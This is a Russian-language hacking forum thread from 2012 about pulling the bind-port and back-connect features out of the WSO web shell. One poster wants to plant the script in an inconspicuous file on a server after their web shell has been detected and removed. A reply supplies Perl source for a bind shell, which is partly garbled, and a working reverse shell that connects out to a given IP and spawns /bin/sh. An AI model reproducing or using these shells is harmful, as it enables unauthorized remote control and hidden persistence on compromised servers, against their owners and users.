Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Бинд-порт (https://forum.antichat.xyz/showthread.php?t=349141)

Pirotexnik 30.08.2012 05:08

В всо реализован встроенный биндпорт и бэк коннект.

Цитата:

Сообщение от None
www-data 12657 0.0 0.0 21128 2564 ? S Aug28 0:00 perl /tmp/bp.pl 31337
www-data 28492 0.0 0.0 3956 580 ? S 04:01 0:00 sh -c ps aux | grep bp.pl
www-data 28494 0.0 0.0 3956 312 ? D 04:01 0:00 sh -c ps aux | grep bp.pl

Тоесть в темпе создается перловый скрипт, биндится порт и скрипт сносится, так?

Как вырезать эту штуку из всо для отдельного использования?

Например спалили шелл, удалили. А в какой-то неприметный файлик можно воткнуть этот скрипт.

Спасибо.

Konqi 30.08.2012 08:01

биндпорт

Код:

Code:
#!/usr/bin/perl

$SHELL="/bin/sh -i";

if (@ARGV &CONN";

                open STDERR,">&CONN";

                exec $SHELL || die print CONN "Cant execute $SHELL\n";

                close CONN;

       
        exit 0;

        }

}

бек.

Код:

Code:
#!/usr/bin/perl

use Socket;

$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");

$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET, $paddr) || die("Error: $!\n");

open(STDIN, ">&SOCKET");

open(STDOUT, ">&SOCKET");

open(STDERR, ">&SOCKET");

system('/bin/sh -i');

close(STDIN);

close(STDOUT);

close(STDERR);

посмотрели бы исходники WSO, тела скриптов лежат внутри переменной, кодированные в base64

RexelNet 01.09.2012 03:30

есть серв с забинденным портом , выбераю telnet , подключаюсь норм, но не выполняются команды , и не выводится результат что делать? был вариант искать рутнутый ssh Но так как нет в наличии таких, отпадает вариант, что посоветуете?


Время: 09:12